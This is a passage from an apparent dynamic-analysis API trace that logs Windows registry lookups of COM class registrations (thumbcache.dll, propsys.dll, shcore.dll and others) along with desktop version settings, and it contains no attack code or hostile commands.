pdwType=0x20ce2e0, pvData=0xd2d93a0, pcbData=0x20ce338*=0x6c | out: pdwType=0x20ce2e0*=0x1, pvData="Thumbnail Cache Class Factory for Out of Proc Server", pcbData=0x20ce338*=0x6a) returned 0x0 [0272.400] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0272.400] RegGetValueW (in: hkey=0x1116, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x20ce230, pvData=0x0, pcbData=0x20ce288*=0x0 | out: pdwType=0x20ce230*=0x0, pvData=0x0, pcbData=0x20ce288*=0x0) returned 0x2 [0272.400] RegGetValueW (in: hkey=0x1116, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20ce270, pvData=0x0, pcbData=0x20ce2c8*=0x0 | out: pdwType=0x20ce270*=0x1, pvData=0x0, pcbData=0x20ce2c8*=0x48) returned 0x0 [0272.400] RegGetValueW (in: hkey=0x1116, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20ce270, pvData=0xd392310, pcbData=0x20ce2c8*=0x48 | out: pdwType=0x20ce270*=0x1, pvData="C:\\Windows\\System32\\thumbcache.dll", pcbData=0x20ce2c8*=0x46) returned 0x0 [0272.401] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0272.401] RegGetValueW (in: hkey=0x1116, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x20ce220, pvData=0x20ce240, pcbData=0x20ce208*=0x3c | out: pdwType=0x20ce220*=0x1, pvData="Apartment", pcbData=0x20ce208*=0x14) returned 0x0 [0272.401] RegGetValueW (in: hkey=0xdd6, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x20ce290, pvData=0x0, pcbData=0x20ce2e8*=0x0 | out: pdwType=0x20ce290*=0x0, pvData=0x0, pcbData=0x20ce2e8*=0x0) returned 0x2 [0272.401] RegGetValueW (in: hkey=0xdd6, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x20ce290, pvData=0x0, pcbData=0x20ce2e8*=0x0 | out: pdwType=0x20ce290*=0x0, pvData=0x0, pcbData=0x20ce2e8*=0x0) returned 0x2 [0272.759] RegGetValueW (in: hkey=0x10b6, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x20cd050, pcbData=0x20ccf98*=0xc8 | out: pdwType=0x0, pvData=0x20cd050, pcbData=0x20ccf98*=0xc8) returned 0x2 [0272.759] RegGetValueW (in: hkey=0x10b6, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20ccea0, pvData=0x0, pcbData=0x20ccef8*=0x0 | out: pdwType=0x20ccea0*=0x1, pvData=0x0, pcbData=0x20ccef8*=0x22) returned 0x0 [0272.759] RegGetValueW (in: hkey=0x10b6, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20ccea0, pvData=0xd22eb50, pcbData=0x20ccef8*=0x22 | out: pdwType=0x20ccea0*=0x1, pvData="PSFactoryBuffer", pcbData=0x20ccef8*=0x20) returned 0x0 [0272.759] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0272.759] RegGetValueW (in: hkey=0x10ba, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x20ccdf0, pvData=0x0, pcbData=0x20cce48*=0x0 | out: pdwType=0x20ccdf0*=0x0, pvData=0x0, pcbData=0x20cce48*=0x0) returned 0x2 [0272.759] RegGetValueW (in: hkey=0x10ba, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20cce30, pvData=0x0, pcbData=0x20cce88*=0x0 | out: pdwType=0x20cce30*=0x1, pvData=0x0, pcbData=0x20cce88*=0x44) returned 0x0 [0272.759] RegGetValueW (in: hkey=0x10ba, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20cce30, pvData=0xd392630, pcbData=0x20cce88*=0x44 | out: pdwType=0x20cce30*=0x1, pvData="C:\\Windows\\system32\\propsys.dll", pcbData=0x20cce88*=0x44) returned 0x0 [0272.760] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0272.760] RegGetValueW (in: hkey=0x10ba, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x20ccde0, pvData=0x20cce00, pcbData=0x20ccdc8*=0x3c | out: pdwType=0x20ccde0*=0x1, pvData="Both", pcbData=0x20ccdc8*=0xa) returned 0x0 [0272.760] RegGetValueW (in: hkey=0x10b6, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x20cce50, pvData=0x0, pcbData=0x20ccea8*=0x0 | out: pdwType=0x20cce50*=0x0, pvData=0x0, pcbData=0x20ccea8*=0x0) returned 0x2 [0272.760] RegGetValueW (in: hkey=0x10b6, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x20cce50, pvData=0x0, pcbData=0x20ccea8*=0x0 | out: pdwType=0x20cce50*=0x0, pvData=0x0, pcbData=0x20ccea8*=0x0) returned 0x2 [0273.040] RegGetValueW (in: hkey=0xdd6, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x20cc350, pcbData=0x20cc298*=0xc8 | out: pdwType=0x0, pvData=0x20cc350, pcbData=0x20cc298*=0xc8) returned 0x2 [0273.040] RegGetValueW (in: hkey=0xdd6, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20cc1a0, pvData=0x0, pcbData=0x20cc1f8*=0x0 | out: pdwType=0x20cc1a0*=0x1, pvData=0x0, pcbData=0x20cc1f8*=0x22) returned 0x0 [0273.040] RegGetValueW (in: hkey=0xdd6, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20cc1a0, pvData=0xd22e640, pcbData=0x20cc1f8*=0x22 | out: pdwType=0x20cc1a0*=0x1, pvData="PSFactoryBuffer", pcbData=0x20cc1f8*=0x20) returned 0x0 [0273.040] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0273.040] RegGetValueW (in: hkey=0xfea, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x20cc0f0, pvData=0x0, pcbData=0x20cc148*=0x0 | out: pdwType=0x20cc0f0*=0x0, pvData=0x0, pcbData=0x20cc148*=0x0) returned 0x2 [0273.040] RegGetValueW (in: hkey=0xfea, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20cc130, pvData=0x0, pcbData=0x20cc188*=0x0 | out: pdwType=0x20cc130*=0x1, pvData=0x0, pcbData=0x20cc188*=0x44) returned 0x0 [0273.040] RegGetValueW (in: hkey=0xfea, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20cc130, pvData=0xd391960, pcbData=0x20cc188*=0x44 | out: pdwType=0x20cc130*=0x1, pvData="C:\\Windows\\System32\\ActXPrxy.dll", pcbData=0x20cc188*=0x42) returned 0x0 [0273.040] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0273.040] RegGetValueW (in: hkey=0xfea, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x20cc0e0, pvData=0x20cc100, pcbData=0x20cc0c8*=0x3c | out: pdwType=0x20cc0e0*=0x1, pvData="Both", pcbData=0x20cc0c8*=0xa) returned 0x0 [0273.041] RegGetValueW (in: hkey=0xdd6, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x20cc150, pvData=0x0, pcbData=0x20cc1a8*=0x0 | out: pdwType=0x20cc150*=0x0, pvData=0x0, pcbData=0x20cc1a8*=0x0) returned 0x2 [0273.041] RegGetValueW (in: hkey=0xdd6, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x20cc150, pvData=0x0, pcbData=0x20cc1a8*=0x0 | out: pdwType=0x20cc150*=0x0, pvData=0x0, pcbData=0x20cc1a8*=0x0) returned 0x2 [0273.428] RegGetValueW (in: hkey=0xc26, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x20ce490, pcbData=0x20ce3d8*=0xc8 | out: pdwType=0x0, pvData=0x20ce490, pcbData=0x20ce3d8*=0xc8) returned 0x2 [0273.428] RegGetValueW (in: hkey=0xc26, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20ce2e0, pvData=0x0, pcbData=0x20ce338*=0x0 | out: pdwType=0x20ce2e0*=0x1, pvData=0x0, pcbData=0x20ce338*=0x6c) returned 0x0 [0273.429] RegGetValueW (in: hkey=0xc26, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20ce2e0, pvData=0xd2de420, pcbData=0x20ce338*=0x6c | out: pdwType=0x20ce2e0*=0x1, pvData="Thumbnail Cache Class Factory for Out of Proc Server", pcbData=0x20ce338*=0x6a) returned 0x0 [0273.429] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0273.429] RegGetValueW (in: hkey=0x1116, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x20ce230, pvData=0x0, pcbData=0x20ce288*=0x0 | out: pdwType=0x20ce230*=0x0, pvData=0x0, pcbData=0x20ce288*=0x0) returned 0x2 [0273.429] RegGetValueW (in: hkey=0x1116, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20ce270, pvData=0x0, pcbData=0x20ce2c8*=0x0 | out: pdwType=0x20ce270*=0x1, pvData=0x0, pcbData=0x20ce2c8*=0x48) returned 0x0 [0273.429] RegGetValueW (in: hkey=0x1116, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20ce270, pvData=0xd392680, pcbData=0x20ce2c8*=0x48 | out: pdwType=0x20ce270*=0x1, pvData="C:\\Windows\\System32\\thumbcache.dll", pcbData=0x20ce2c8*=0x46) returned 0x0 [0273.429] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0273.429] RegGetValueW (in: hkey=0x1116, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x20ce220, pvData=0x20ce240, pcbData=0x20ce208*=0x3c | out: pdwType=0x20ce220*=0x1, pvData="Apartment", pcbData=0x20ce208*=0x14) returned 0x0 [0273.429] RegGetValueW (in: hkey=0xc26, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x20ce290, pvData=0x0, pcbData=0x20ce2e8*=0x0 | out: pdwType=0x20ce290*=0x0, pvData=0x0, pcbData=0x20ce2e8*=0x0) returned 0x2 [0273.429] RegGetValueW (in: hkey=0xc26, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x20ce290, pvData=0x0, pcbData=0x20ce2e8*=0x0 | out: pdwType=0x20ce290*=0x0, pvData=0x0, pcbData=0x20ce2e8*=0x0) returned 0x2 [0273.639] RegGetValueW (in: hkey=0xc26, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x20cc270, pcbData=0x20cc1b8*=0xc8 | out: pdwType=0x0, pvData=0x20cc270, pcbData=0x20cc1b8*=0xc8) returned 0x2 [0273.639] RegGetValueW (in: hkey=0xc26, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20cc0c0, pvData=0x0, pcbData=0x20cc118*=0x0 | out: pdwType=0x20cc0c0*=0x1, pvData=0x0, pcbData=0x20cc118*=0x22) returned 0x0 [0273.639] RegGetValueW (in: hkey=0xc26, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20cc0c0, pvData=0xd22ebb0, pcbData=0x20cc118*=0x22 | out: pdwType=0x20cc0c0*=0x1, pvData="PSFactoryBuffer", pcbData=0x20cc118*=0x20) returned 0x0 [0273.639] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0273.639] RegGetValueW (in: hkey=0x1116, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x20cc010, pvData=0x0, pcbData=0x20cc068*=0x0 | out: pdwType=0x20cc010*=0x0, pvData=0x0, pcbData=0x20cc068*=0x0) returned 0x2 [0273.639] RegGetValueW (in: hkey=0x1116, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20cc050, pvData=0x0, pcbData=0x20cc0a8*=0x0 | out: pdwType=0x20cc050*=0x1, pvData=0x0, pcbData=0x20cc0a8*=0x44) returned 0x0 [0273.639] RegGetValueW (in: hkey=0x1116, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20cc050, pvData=0xd392310, pcbData=0x20cc0a8*=0x44 | out: pdwType=0x20cc050*=0x1, pvData="C:\\Windows\\system32\\propsys.dll", pcbData=0x20cc0a8*=0x44) returned 0x0 [0273.640] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0273.640] RegGetValueW (in: hkey=0x1116, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x20cc000, pvData=0x20cc020, pcbData=0x20cbfe8*=0x3c | out: pdwType=0x20cc000*=0x1, pvData="Both", pcbData=0x20cbfe8*=0xa) returned 0x0 [0273.640] RegGetValueW (in: hkey=0xc26, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x20cc070, pvData=0x0, pcbData=0x20cc0c8*=0x0 | out: pdwType=0x20cc070*=0x0, pvData=0x0, pcbData=0x20cc0c8*=0x0) returned 0x2 [0273.640] RegGetValueW (in: hkey=0xc26, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x20cc070, pvData=0x0, pcbData=0x20cc0c8*=0x0 | out: pdwType=0x20cc070*=0x0, pvData=0x0, pcbData=0x20cc0c8*=0x0) returned 0x2 [0273.640] RegGetValueW (in: hkey=0x1116, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x20cc5a0, pcbData=0x20cc4e8*=0xc8 | out: pdwType=0x0, pvData=0x20cc5a0, pcbData=0x20cc4e8*=0xc8) returned 0x2 [0273.640] RegGetValueW (in: hkey=0x1116, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20cc3f0, pvData=0x0, pcbData=0x20cc448*=0x0 | out: pdwType=0x20cc3f0*=0x1, pvData=0x0, pcbData=0x20cc448*=0x2e) returned 0x0 [0273.640] RegGetValueW (in: hkey=0x1116, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20cc3f0, pvData=0xd37ca30, pcbData=0x20cc448*=0x2e | out: pdwType=0x20cc3f0*=0x1, pvData="Shell Oplock Provider", pcbData=0x20cc448*=0x2c) returned 0x0 [0273.640] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0273.640] RegGetValueW (in: hkey=0xdda, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x20cc340, pvData=0x0, pcbData=0x20cc398*=0x0 | out: pdwType=0x20cc340*=0x0, pvData=0x0, pcbData=0x20cc398*=0x0) returned 0x2 [0273.641] RegGetValueW (in: hkey=0xdda, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20cc380, pvData=0x0, pcbData=0x20cc3d8*=0x0 | out: pdwType=0x20cc380*=0x1, pvData=0x0, pcbData=0x20cc3d8*=0x42) returned 0x0 [0273.641] RegGetValueW (in: hkey=0xdda, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20cc380, pvData=0xd3929a0, pcbData=0x20cc3d8*=0x42 | out: pdwType=0x20cc380*=0x1, pvData="C:\\Windows\\system32\\shcore.dll", pcbData=0x20cc3d8*=0x42) returned 0x0 [0273.641] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0273.641] RegGetValueW (in: hkey=0xdda, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x20cc330, pvData=0x20cc350, pcbData=0x20cc318*=0x3c | out: pdwType=0x20cc330*=0x1, pvData="Both", pcbData=0x20cc318*=0xa) returned 0x0 [0273.641] RegGetValueW (in: hkey=0x1116, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x20cc3a0, pvData=0x0, pcbData=0x20cc3f8*=0x0 | out: pdwType=0x20cc3a0*=0x0, pvData=0x0, pcbData=0x20cc3f8*=0x0) returned 0x2 [0273.641] RegGetValueW (in: hkey=0x1116, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x20cc3a0, pvData=0x0, pcbData=0x20cc3f8*=0x0 | out: pdwType=0x20cc3a0*=0x0, pvData=0x0, pcbData=0x20cc3f8*=0x0) returned 0x2 Thread: id = 93 os_tid = 0x844 Thread: id = 94 os_tid = 0x83c Thread: id = 95 os_tid = 0x838 [0243.399] RegGetValueW (in: hkey=0x12ba, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x16cde0, pcbData=0x16cd28*=0xc8 | out: pdwType=0x0, pvData=0x16cde0, pcbData=0x16cd28*=0xc8) returned 0x2 [0243.399] RegGetValueW (in: hkey=0x12ba, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x16cc30, pvData=0x0, pcbData=0x16cc88*=0x0 | out: pdwType=0x16cc30*=0x0, pvData=0x0, pcbData=0x16cc88*=0x0) returned 0x2 [0243.399] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0243.399] RegGetValueW (in: hkey=0x12c2, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x16cb80, pvData=0x0, pcbData=0x16cbd8*=0x0 | out: pdwType=0x16cb80*=0x0, pvData=0x0, pcbData=0x16cbd8*=0x0) returned 0x2 [0243.399] RegGetValueW (in: hkey=0x12c2, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x16cbc0, pvData=0x0, pcbData=0x16cc18*=0x0 | out: pdwType=0x16cbc0*=0x1, pvData=0x0, pcbData=0x16cc18*=0x50) returned 0x0 [0243.399] RegGetValueW (in: hkey=0x12c2, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x16cbc0, pvData=0x5d03bf0, pcbData=0x16cc18*=0x50 | out: pdwType=0x16cbc0*=0x1, pvData="C:\\Windows\\system32\\windowscodecs.dll", pcbData=0x16cc18*=0x50) returned 0x0 [0243.399] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0243.399] RegGetValueW (in: hkey=0x12c2, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x16cb70, pvData=0x16cb90, pcbData=0x16cb58*=0x3c | out: pdwType=0x16cb70*=0x1, pvData="Both", pcbData=0x16cb58*=0xa) returned 0x0 [0243.400] RegGetValueW (in: hkey=0x12ba, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x16cbe0, pvData=0x0, pcbData=0x16cc38*=0x0 | out: pdwType=0x16cbe0*=0x0, pvData=0x0, pcbData=0x16cc38*=0x0) returned 0x2 [0243.400] RegGetValueW (in: hkey=0x12ba, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x16cbe0, pvData=0x0, pcbData=0x16cc38*=0x0 | out: pdwType=0x16cbe0*=0x0, pvData=0x0, pcbData=0x16cc38*=0x0) returned 0x2 [0243.449] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0243.449] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0243.450] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0243.450] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0248.446] RegGetValueW (in: hkey=0x139e, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x16f090, pcbData=0x16efd8*=0xc8 | out: pdwType=0x0, pvData=0x16f090, pcbData=0x16efd8*=0xc8) returned 0x2 [0248.446] RegGetValueW (in: hkey=0x139e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x16eee0, pvData=0x0, pcbData=0x16ef38*=0x0 | out: pdwType=0x16eee0*=0x1, pvData=0x0, pcbData=0x16ef38*=0x2e) returned 0x0 [0248.447] RegGetValueW (in: hkey=0x139e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x16eee0, pvData=0xd1edd10, pcbData=0x16ef38*=0x2e | out: pdwType=0x16eee0*=0x1, pvData="Shared Task Scheduler", pcbData=0x16ef38*=0x2c) returned 0x0 [0248.447] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0248.447] RegGetValueW (in: hkey=0x159a, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x16ee30, pvData=0x0, pcbData=0x16ee88*=0x0 | out: pdwType=0x16ee30*=0x0, pvData=0x0, pcbData=0x16ee88*=0x0) returned 0x2 [0248.447] RegGetValueW (in: hkey=0x159a, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x16ee70, pvData=0x0, pcbData=0x16eec8*=0x0 | out: pdwType=0x16ee70*=0x1, pvData=0x0, pcbData=0x16eec8*=0x54) returned 0x0 [0248.447] RegGetValueW (in: hkey=0x159a, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x16ee70, pvData=0x5d053f0, pcbData=0x16eec8*=0x54 | out: pdwType=0x16ee70*=0x1, pvData="C:\\Windows\\system32\\windows.storage.dll", pcbData=0x16eec8*=0x54) returned 0x0 [0248.447] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0248.447] RegGetValueW (in: hkey=0x159a, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x16ee20, pvData=0x16ee40, pcbData=0x16ee08*=0x3c | out: pdwType=0x16ee20*=0x1, pvData="Apartment", pcbData=0x16ee08*=0x14) returned 0x0 [0248.447] RegGetValueW (in: hkey=0x139e, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x16ee90, pvData=0x0, pcbData=0x16eee8*=0x0 | out: pdwType=0x16ee90*=0x0, pvData=0x0, pcbData=0x16eee8*=0x0) returned 0x2 [0248.447] RegGetValueW (in: hkey=0x139e, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x16ee90, pvData=0x0, pcbData=0x16eee8*=0x0 | out: pdwType=0x16ee90*=0x0, pvData=0x0, pcbData=0x16eee8*=0x0) returned 0x2 [0253.509] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0253.509] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0253.510] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0253.510] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0271.641] RegGetValueW (in: hkey=0x908, lpSubKey=0x0, lpValue=0x0, dwFlags=0x2, pdwType=0x0, pvData=0x16c540, pcbData=0x16c040*=0x1048 | out: pdwType=0x0, pvData=0x16c540, pcbData=0x16c040*=0x1048) returned 0x2 [0271.641] RegGetValueW (in: hkey=0x908, lpSubKey=0x0, lpValue=0x0, dwFlags=0x2, pdwType=0x0, pvData=0x16c280, pcbData=0x16bf44*=0x208 | out: pdwType=0x0, pvData=0x16c280, pcbData=0x16bf44*=0x208) returned 0x2 [0271.741] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0271.741] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0271.742] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0271.742] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0271.895] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0271.895] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d964, pcbData=0x16d960*=0x4 | out: pdwType=0x0, pvData=0x16d964, pcbData=0x16d960*=0x4) returned 0x2 [0271.895] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0271.895] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d900, pcbData=0x16d8c0*=0x4 | out: pdwType=0x0, pvData=0x16d900, pcbData=0x16d8c0*=0x4) returned 0x0 [0271.927] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0271.927] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0271.927] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0271.927] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0272.271] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0272.271] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0272.271] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0272.271] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0272.364] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0272.364] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0272.364] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0272.364] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0272.384] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0272.384] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", lpValue="DisplayVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4 | out: pdwType=0x0, pvData=0x16d944, pcbData=0x16d940*=0x4) returned 0x2 [0272.384] StrCmpIW (psz1="PaintDesktopVersion", psz2="DelegateExecute") returned 1 [0272.384] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Control Panel\\Desktop", lpValue="PaintDesktopVersion", dwFlags=0x10, pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4 | out: pdwType=0x0, pvData=0x16d8e0, pcbData=0x16d8a0*=0x4) returned 0x0 [0272.450] StrCmpIW (psz1="DisplayVersion", psz2="DelegateExecute") returned 1 [0272.450] RegGetValueW (in: hkey=0xffffffff80000002, 